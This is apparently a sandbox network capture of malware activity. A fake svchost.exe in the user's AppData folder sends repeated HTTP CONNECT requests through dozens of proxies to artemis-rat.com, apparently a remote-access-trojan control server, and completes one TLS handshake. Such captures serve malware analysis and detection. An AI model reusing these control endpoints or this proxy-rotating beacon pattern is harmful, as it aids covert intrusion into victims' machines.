Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2043	192.168.2.5	56430	162.240.72.139	37445	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.620990992 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.138165951 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.880345106 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2044	192.168.2.5	56320	93.190.142.57	31243	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.647363901 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.941826105 CET	226	IN	HTTP/1.1 403 Forbidden Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Length: 101 Content-Type: text/plain; charset=utf-8 Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2045	192.168.2.5	56359	54.178.159.199	18080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.647435904 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.907586098 CET	503	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sat, 09 Mar 2024 12:14:28 GMT Connection: close Content-Length: 324 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 55 52 4c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid URL</h2><hr><p>HTTP Error 400. The request URL is invalid.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2046	192.168.2.5	55452	164.92.86.113	62987	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.647504091 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.333415985 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2047	192.168.2.5	56304	193.239.58.92	8081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.648410082 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2048	192.168.2.5	56514	104.20.225.218	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.653590918 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.807938099 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2049	192.168.2.5	56492	146.190.35.152	8000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.655626059 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.833410025 CET	19	IN	HTTP/1.0 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2050	192.168.2.5	56467	73.151.59.35	20816	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.658126116 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2051	192.168.2.5	56322	128.140.26.12	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.658252001 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2052	192.168.2.5	56715	202.159.19.213	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.665126085 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2053	192.168.2.5	56502	142.4.123.41	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.665947914 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2054	192.168.2.5	56716	202.159.19.213	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.667176962 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2055	192.168.2.5	56718	202.159.19.213	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.669773102 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2056	192.168.2.5	56719	202.159.19.213	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.670948982 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2057	192.168.2.5	56518	104.25.64.27	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.671658993 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.826039076 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2058	192.168.2.5	56340	51.89.173.40	30199	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.673705101 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.333111048 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2059	192.168.2.5	56528	104.22.50.220	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.674954891 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.829401970 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2060	192.168.2.5	56475	157.185.157.151	26589	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.680757046 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2061	192.168.2.5	56321	178.54.21.203	8081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.680830002 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2062	192.168.2.5	56542	185.162.229.215	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.682099104 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.836148977 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2063	192.168.2.5	56548	172.67.105.234	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.684840918 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.839027882 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2064	192.168.2.5	56743	202.159.35.189	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.685535908 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2065	192.168.2.5	56746	202.159.35.189	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.687402964 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2066	192.168.2.5	56378	134.209.29.120	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.695059061 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.790123940 CET	28	IN	HTTP/1.1 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2067	192.168.2.5	56555	162.159.246.135	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.695060015 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.855988026 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2068	192.168.2.5	56323	171.250.222.13	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.699934959 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.442709923 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.646145105 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2069	192.168.2.5	56352	196.20.125.149	8083	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.703663111 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2070	192.168.2.5	56349	52.67.10.183	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.703911066 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.033840895 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:28 GMT Server: nginx Content-Type: text/plain Content-Length: 0
Mar 9, 2024 13:14:29.046055079 CET	177	OUT	Data Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 a3 e1 88 0f a4 48 ef 76 a0 16 88 07 71 11 63 e9 54 5d ed c3 98 64 3f e4 47 82 de 68 76 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: eRHvqcT]d?Ghv*,+0/$#('=<5/Uartemis-rat.com#
Mar 9, 2024 13:14:29.372229099 CET	1079	IN	Data Raw: 16 03 03 00 3d 02 00 00 39 03 03 51 42 da 1b 42 75 00 4f 74 d1 3d 34 f3 10 32 b4 15 1c 8f 6a c0 90 ef d3 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30 Data Ascii: =9QBBuOt=42jDOWNGRD0000H010Uartemis-rat.com0240309121340Z260309121340Z010Uartemis-rat.com0"0H0Z~fVz'
Mar 9, 2024 13:14:29.396013975 CET	93	OUT	Data Raw: 16 03 03 00 25 10 00 00 21 20 8d 1c e7 a7 0c a3 62 a9 c3 cd 4d c4 5f d4 32 3a 76 0d 4b 7b 75 ce 4b 75 d6 59 35 38 ce d6 74 04 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 04 ba 0e fa 2f bf b6 c1 28 c7 fd f9 23 53 23 ec c0 eb 65 52 22 Data Ascii: %! bM_2:vK{uKuY58t(/(#S#eR"O!A@
Mar 9, 2024 13:14:29.724057913 CET	51	IN	Data Raw: 14 03 03 00 01 01 16 03 03 00 28 5b 94 3c 99 0f 68 1b 38 c4 f4 93 ca af 26 68 6c 81 e2 d6 bf d3 1d b8 ab 0d e4 37 4d 42 b0 40 6b a1 2d 40 c4 a0 59 46 2e Data Ascii: ([<h8&hl7MB@k-@YF.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2071	192.168.2.5	55403	45.128.133.1	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.712224007 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2072	192.168.2.5	56567	172.64.80.55	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
